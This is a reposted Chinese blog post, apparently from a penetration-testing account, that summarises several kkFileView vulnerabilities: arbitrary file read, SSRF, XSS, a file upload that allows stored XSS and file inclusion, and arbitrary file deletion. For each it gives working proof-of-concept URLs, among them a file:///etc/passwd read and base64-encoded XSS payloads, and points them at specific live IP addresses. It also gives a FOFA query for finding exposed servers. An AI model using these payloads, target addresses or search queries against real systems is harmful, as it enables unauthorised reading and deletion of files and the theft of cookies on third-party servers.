kkFileView漏洞总结

2024年3月3日04:52:06评论55 views字数 2106阅读7分1秒阅读模式

0x00 kkFileview存在任意文件读取漏洞

漏洞描述

Keking KkFileview是中国凯京科技（Keking）公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞，该漏洞源于存在通过目录遍历漏洞读取任意文件，可能导致相关主机上的敏感文件泄漏。

漏洞影响

kkFileview <=3.6.0

fofa查询

body="kkFile：View"

漏洞证明

kkFileView漏洞总结

http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

kkFileView漏洞总结

0x01 kkFileView SSR 漏洞

漏洞描述

kkFileview v4.1.0存在SSRF漏洞，攻击者可以利用此漏洞造成服务器端请求伪造（SSRF），远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。

漏洞影响

kkFileview =v4.1.0

漏洞证明

kkFileView漏洞总结

http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

kkFileView漏洞总结

0x03 kkFileView XSS漏洞

漏洞描述

kkFileview v4.1.0存两处XSS漏洞，可能导致网站cookies泄露。

漏洞影响

kkFileview =v4.1.0

漏洞证明

http://www.baidu.com/test.txt"><img src=111 onerror=alert(1)>

编码base64:

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==

url编码：

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

poc1:

/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E

/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E

kkFileView漏洞总结

http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

kkFileView漏洞总结

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+

url编码：

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

poc2:

/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

http://119.91.146.127:8012/picturesPreview?urls=¤tUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

kkFileView漏洞总结

0x04 kkFileView任意文件上传导致xss和文件包含漏洞

漏洞描述

kkFileview全版本存在文件解析漏洞，攻击者可以利用此漏洞造成存储型 XSS、文件包含或者SSRF，远程攻击者可以通过将任意JavaSript脚本上传到服务器来持久性的利用应用程序发出攻击请求

漏洞影响

kkFileView=4.1.0

漏洞证明

1、上传文件

kkFileView漏洞总结

2、访问漏洞位置
http://139.9.101.60:8012/demo/2.html

kkFileView漏洞总结

2.文件包含：

https://file.keking.cn/demo/test1.js
kkFileView漏洞总结
访问：
https://file.keking.cn/demo/test14.html

0x05 kkFileView任意文件删除漏洞

漏洞描述

kkFileview v4.0.0存在任意文件删除漏洞，可能导致系统任意文件被删除

漏洞影响

kkFileview= v4.0.0

漏洞证明

/deleteFile?fileName=demo%2F..xss.pdf
get请求此uri会删除kkFileView-masterserversrcmainfile目录中的xss.pdf（原本只能删除kkFileView-masterserversrcmainfiledemo目录下的文件)

kkFileView漏洞总结

作者：渗透测试中心原文连接：https://www.cnblogs.com/xbbth/p/17446987.html

原文始发于微信公众号（实战安全研究）：kkFileView漏洞总结

左青龙
微信扫一扫

右白虎
微信扫一扫

kkFileView漏洞总结

0x00 kkFileview存在任意文件读取漏洞

0x01 kkFileView SSR 漏洞

0x03 kkFileView XSS漏洞

0x04 kkFileView任意文件上传导致xss和文件包含漏洞

0x05 kkFileView任意文件删除漏洞

漏洞描述

漏洞影响

漏洞证明

金庸武侠-非线性理解的屌丝逆袭

【情报实战】原来我军有这么多信息被公开在互联网上

DataTrove：一款针对大规模文本数据的处理、过滤和消除重复数据工具

PlugX又有新变种，感染250万个服务器

实验性 Morris II 蠕虫病毒可以利用流行的人工智能服务窃取数据并传播恶意软件

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

蚂蚁集团韦韬：DKCF可信框架大模型从砖家到专家还有多远？

一次勒索攻击案例追踪 | 从最初的漏洞利用到最终的部署勒索软件历时29天

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

任意用户登录漏洞挖掘思路

发表评论